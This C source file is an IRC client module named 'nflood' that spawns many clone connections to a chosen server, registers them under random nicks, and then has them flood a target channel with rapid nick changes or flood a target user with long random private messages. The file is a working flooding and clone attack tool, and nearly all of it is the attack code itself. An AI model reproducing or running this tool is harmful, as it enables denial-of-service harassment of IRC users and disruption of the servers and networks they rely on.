#include "irc.h"
#include "struct.h"
#include "ircaux.h"
#include "module.h"
#include "misc.h"
#include "dcc.h"

time_t nflood_start;
int delay_time = 0;
int ready = 0;

char *nflood_chan = NULL;

#define CLONE_WAIT	0x0001
#define CLONE_ACTIVE	0x0002

#define HAVE_JOIN	0x0010
#define DO_FLOOD	0x0020
#define START_FLOOD	0x0040

void do_nflood ( int s )
{
char buffer[BIG_BUFFER_SIZE+1];
SocketList *d = NULL;
int count;
	if (!nflood_chan || !(d = get_socket(s)))
		return;
	if ((d->flags & CLONE_WAIT))
	{
		d->flags = CLONE_ACTIVE;
		return;
	}
	if (s == ready)
		ready = -1;

	if ((count = dgets(buffer, s, 1, BIG_BUFFER_SIZE)) < 0)
	{
		close_socketread(s); 
		return;
	} else if (count == 0)
		return;
	if (!(d->flags & DO_FLOOD))
	{
		char *p; int i;
		p = strchr(buffer, ' ');
		i = my_atol(p);
		if (i == 376)
			d->flags |= DO_FLOOD;
	}
	if (ready != -1) 
		return;
	if ((time(NULL) - nflood_start) < delay_time)
		return;
	if (is_channel(nflood_chan))
	{
		if (!(d->flags & HAVE_JOIN))
		{
			dcc_printf(s, "JOIN %s\r\n", nflood_chan);
			d->flags |= HAVE_JOIN;
		} else
			dcc_printf(s, "NICK %s\r\n", random_str(3,11));
	}
	else
		dcc_printf(s, "PRIVMSG %s :%s\r\n", nflood_chan, random_str(100,450));
	d->flags |= START_FLOOD;
}

void nflood (IrcCommandDll *interp, char *command, char *args, char *subargs, char *helparg)
{
char *n, *d, *ni;
int count = 1, delay = 20;
int i, s = -1;

char *host = "panasync.canuck.ca";
unsigned short port = 6667;

	if (!args || !*args || !(n = next_arg(args, &args)) || !(d = next_arg(args, &args)) || !(ni = next_arg(args, &args)) || !args || !*args)
	{
		userage("nflood", "#clones delay nick|#channel serverlist");
		return;
	}
	count = my_atol(n);
	if (count <= 0)
		count = 1;
	delay_time = my_atol(d);
	if (delay_time <= 5)
		delay_time = 5;
	host = m_strdup(args);
	for (i = 0; i < count; i++)
	{
		s = -1;		
		if ((s = connect_by_number(host, &port, SERVICE_CLIENT, PROTOCOL_TCP, 1)) < 0)
			continue;
		add_socketread(s, port, CLONE_WAIT, host, do_nflood, NULL);
		dcc_printf(s, "NICK %s\r\n", random_str(3, 11));
		dcc_printf(s, "USER %s %s %s %s\r\n", random_str(3,9), hostname, random_str(1, 20), random_str(1,11));
		ready = s;
	}	
	nflood_start = time(NULL);
	nflood_chan = m_strdup(ni);

}

char *Nflood_Version(IrcCommandDll **interp)
{
	return "99.9";
}


int Nflood_Init(IrcCommandDll **interp)
{

	add_module_proc(COMMAND_PROC, "nflood", "nflood", NULL, 0, 0, nflood, NULL);

}
